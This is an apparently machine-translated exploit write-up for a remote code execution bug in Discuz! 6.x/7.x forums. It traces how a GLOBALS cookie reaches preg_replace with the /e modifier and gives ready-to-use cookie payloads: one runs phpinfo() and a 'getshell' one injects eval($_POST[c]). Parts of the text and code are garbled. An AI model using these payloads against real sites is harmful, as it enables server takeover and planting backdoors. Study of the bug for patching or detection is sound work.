discuz! 6.x/7.x global Variable Defense bypass causes command execution

Reference: http://wooyun.jozxing.cc/static/bugs/wooyun-2014-080723.html

File located in: include/discuzcode.func.php 第97-241 line function Discuzcode ()

In such a word, $GLOBALS [' _dcache '] [' smilies '] [' Searcharray '], $GLOBALS [' _dcache '] [' smilies '] [' Replacearray ']

$message = preg_replace ($GLOBALS [' _dcache '] [' smilies '] [' Searcharray '], $GLOBALS [' _dcache '] [' smilies '] [' Replacearray '], $message, $maxsmilies);

In 5.3.*, however, the $_request value of this hyper-global variable is affected by Request_order in PHP.ini, and in the latest php5.3.x series, the Request_order default is GP, which means that the default configuration $_ The request contains only $_get and $_post, not $_cookie, so we can submit the Globals variable through a COOKIE. (Default is CGP in 5.3.29)

To demonstrate the vulnerability, set it to GP.

$message = preg_replace ($GLOBALS [' _dcache '] [' smilies '] [' Searcharray '], $GLOBALS [' _dcache '] [' smilies '] [' Replacearray '], $message, $maxsmilies);

A typical vulnerability. Preg_replace () The first two parameters can be controlled, but that is, we just control the first parameter is the/E mode, the second parameter is the PHP code we want to execute, we can form a backdoor.

Here's a point to note that you don't necessarily need the/E mode,

Write a script run to see what characters can be.

<?phppreg_replace ($_get[' a '). * '. $_get[' a ']. ' E ', ' phpinfo (); ', ' a ', 1)?>

　　

Specific "" [E-mail protected]#$%^&* ()-+ etc., but pay attention to the transfer process of escaping.

Submit via Cookie: Globals[_dcache][smilies][searcharray]=/.*/eui; Globals[_dcache][smilies][replacearray]=phpinfo ();

Then echo back where the Discuzcode () function is called.

Viewthread_procpost () function 第619-729 line in/viewthread.php

The Discuzcode () function was called on line No. 725

$post [' message '] = Discuzcode ($post [' message '], $post [' Smileyoff '], $post [' Bbcodeoff '], $post [' Htmlon '] & 1, $ forum[' allowsmilies ', $forum [' Allowbbcode '], ($forum [' Allowimgcode '] && $showimages? 1:0), $forum [' Allowhtml '], ($forum [' Jammer '] && $post [' Authorid ']! = $discuz _uid? 1:0), 0, $post [' Authorid '], $forum [' Allowme Diacode '], $post [' pid ']);

　　

Call the Viewthread_procpost () function again in the first place

while ($post = $sdb->fetch_array ($query)) {if ($onlyauthoradd && $post [' anonymous '] = = 0) | |! $onlyauthoradd) {$postlist [$post [' pid '] = Viewthread_procpost ($post);}}

Come to/include/discuzcode.func.php when the value of $globals[' _dcache ' [' smilies '] is set, you can execute preg_replace (), resulting in code execution.

if (! $smileyoff && $allowsmilies &&!empty ($GLOBALS [' _dcache '] [' smilies ') && Is_array ($ globals[' _dcache ' [' smilies '])) {...}

　　

POC: Added in the cookie: globals[_dcache][smilies][searcharray]=/.*/eui; Globals[_dcache][smilies][replacearray]=phpinfo ();

Then visit either post. /VIEWTHREAD.PHP?TID=13&EXTRA=PAGE%3D1 can trigger a vulnerability.

Getsshell:globals[_dcache][smilies][searcharray]=/.*/eui; Globals[_dcache][smilies][replacearray]=eval ($_post[c])%3b;

discuz! 6.x/7.x global Variable Defense bypass causes command execution